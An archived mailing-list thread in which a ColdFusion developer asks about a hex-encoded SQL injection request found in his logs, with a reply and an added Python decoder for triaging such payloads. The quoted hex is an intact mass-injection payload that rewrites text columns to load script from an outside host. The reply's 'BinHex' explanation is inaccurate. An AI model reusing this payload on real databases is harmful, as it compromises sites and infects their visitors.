This is some sort of encoding... like BinHex. Spammers use it to obscure
URLs and such. Computers read it just fine. If you look around on the
internets you can find a decoder to render it to human readable form. You
just need to figure out what sort of encoding they are using.

On Mon, Jul 21, 2008 at 10:54 AM, Che Vilnonis <[EMAIL PROTECTED]> wrote:

> Just was looking at a 'user monitor' page on one of my sites and I saw the
> URL string below being called. I've seen several SQL injection URLs before,
> but what the heck are they trying to accomplish here? Everything is
> cfqueryparam'ed. Thanks, Che
>
> /rss.cfm?';DECLARE @S CHAR(4000);SET
>
> @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861
>
> 72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F
>
> 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473
>
> 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E
>
> 78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33
>
> 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20
>
> 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375
>
> 72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
>
> 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40
>
> 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D
>
> 22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D
>
> 2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65
>
> 3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322
>
> 3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162
>
> 6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43
> 7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS
> CHAR(4000));EXEC(@S);
> 
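
A decoder of the kind the reply mentions, as an added example that is not part of the original thread: it pulls `CAST(0x... AS CHAR)` literals out of a logged request and renders them as readable SQL for triage. The function name, keyword list and sample request are assumptions constructed for illustration; only the `/rss.cfm` path and the DECLARE/CAST/EXEC shape come from the quoted message.

```python
import re
from urllib.parse import unquote_plus

# CAST(0x<hex> AS CHAR/VARCHAR/NCHAR/NVARCHAR ...), tolerant of wrapped hex
CAST_HEX = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f\s]+)\s*AS\s+(N?(?:VAR)?CHAR)", re.I)
# Assumed triage keywords; extend for your own environment
KEYWORDS = ("exec", "update", "sysobjects", "syscolumns", "cursor", "<script")

def decode_cast_payloads(request_line):
    """Return one finding per hex-encoded CAST literal found in a logged request."""
    text = re.sub(r"(?m)^>\s?", "", request_line)  # drop mail quote markers
    text = unquote_plus(text)                      # undo %xx and '+' from access logs
    findings = []
    for m in CAST_HEX.finditer(text):
        digits = re.sub(r"\s+", "", m.group(1))    # rejoin hex split across lines
        truncated = len(digits) % 2 == 1           # odd length: log line was cut off
        if truncated:
            digits = digits[:-1]
        raw = bytes.fromhex(digits)
        # N-prefixed types hold UTF-16LE; plain CHAR/VARCHAR is single-byte
        wide = m.group(2).upper().startswith("N")
        sql = raw.decode("utf-16-le" if wide else "latin-1", errors="replace")
        findings.append({
            "sql": sql,
            "truncated": truncated,
            "keywords": [k for k in KEYWORDS if k in sql.lower()],
            # True when the decoded string is later run via EXEC(@var)
            "executed": bool(re.search(r"\bEXEC\s*\(\s*@", text[m.end():], re.I)),
        })
    return findings

# Constructed sample: a harmless statement wrapped the way the quoted request is
SAMPLE_SQL = "SELECT name FROM sysobjects"
_hex = SAMPLE_SQL.encode("ascii").hex().upper()
SAMPLE_REQUEST = ("/rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x"
                  + _hex[:20] + "\n> " + _hex[20:] + " AS CHAR(4000));EXEC(@S);")

if __name__ == "__main__":
    for f in decode_cast_payloads(SAMPLE_REQUEST):
        print(f)
```

Run it over access-log lines or a pasted request; a finding with `executed` set and schema or `<script` keywords in the decoded text is worth a closer look even when the page itself is parameterized.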

Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309330